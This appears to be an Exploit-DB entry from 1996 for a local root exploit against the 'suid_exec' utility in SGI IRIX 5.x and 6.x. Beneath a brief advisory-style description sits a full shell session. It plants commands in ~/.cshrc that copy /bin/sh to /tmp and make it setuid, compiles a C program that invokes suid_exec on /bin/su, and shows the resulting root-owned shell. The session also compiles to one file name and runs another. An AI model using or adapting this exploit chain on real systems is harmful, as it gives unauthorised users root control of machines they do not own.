SGI IRIX <= 6.4 suid_exec Vulnerability

1996-12-02T00:00:00
ID EDB-ID:19353
Type exploitdb
Reporter Yuri Volobuev
Modified 1996-12-02T00:00:00

Description

SGI IRIX 6.4 suid_exec Vulnerability. CVE-1999-1114. Local exploit for irix platform

                                        
                                            source: http://www.securityfocus.com/bid/467/info

A vulnerability exists in the 'suid_exec' utility, as shipped by SGI with it's Irix operating system, versions 5.x and 6.x. Suid_exec is part of the Korn shell package, and was originally the mechanism by which ksh executed setuid shell scripts safely. However, it runs using the default shell, and as such will run the configuration files for the shell, such as a .cshrc. By placing malicious code in a .cshrc, and properly running suid_exec, commands can be executed as root. 


% setenv | grep SHELL
SHELL=/bin/tcsh
% mv ~/.cshrc ~/.cshrc.old
% cat > ~/.cshrc
cp /bin/sh /tmp
chmod a+rsx /tmp/sh
^D
% cat > expl.c
main()
{
execl("/sbin/suid_exec","/bin/su","/bin/su",0);
}
^D
% cc expl.c -o expl.c
% ./expl
Too many ('s.
% ls -l /tmp/sh
-r-sr-sr-x 1 root sys 140784 Dec 2 19:21 /tmp/sh*